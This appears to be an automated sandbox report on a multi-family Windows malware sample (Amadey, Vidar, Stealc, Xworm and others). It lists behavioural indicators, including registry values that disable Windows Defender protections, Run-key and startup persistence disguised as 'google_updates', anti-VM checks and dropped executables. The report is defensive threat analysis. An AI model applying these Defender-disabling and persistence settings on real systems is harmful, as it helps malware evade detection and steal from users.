Malware Analysis Report

2025-04-03 09:27

Sample ID 250305-2dtlwa1tat
Target d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
SHA256 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
Tags
amadey healer litehttp stealc systembc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan credential_access
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e

Threat Level: Known bad

The file d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e was found to be: Known bad.

Malicious Activity Summary

amadey healer litehttp stealc systembc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan credential_access

Detects Healer an antivirus disabler dropper

Detect Vidar Stealer

Modifies Windows Defender DisableAntiSpyware settings

Litehttp family

Xworm family

Amadey

Detect Xworm Payload

Healer family

Modifies Windows Defender notification settings

Stealc family

Modifies Windows Defender Real-time Protection settings

Healer

SystemBC

Systembc family

Xworm

LiteHTTP

Amadey family

Modifies Windows Defender TamperProtection settings

Vidar family

Vidar

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks BIOS information in registry

Reads data files stored by FTP clients

.NET Reactor proctector

Checks computer location settings

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Identifies Wine through registry keys

Loads dropped DLL

Reads user/profile data of local email clients

Drops startup file

Windows security modification

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Unsigned PE

Modifies registry class

Scheduled Task/Job: Scheduled Task

Checks processor information in registry

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-05 22:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 22:28

Reported

2025-03-05 22:30

Platform

win7-20240903-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\69c80032ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\69c80032ec.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\63f1932a62.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\63f1932a62.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8e275fbb94.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8e275fbb94.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8QpbZ8u9\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\460d9c14c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\460d9c14c9.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
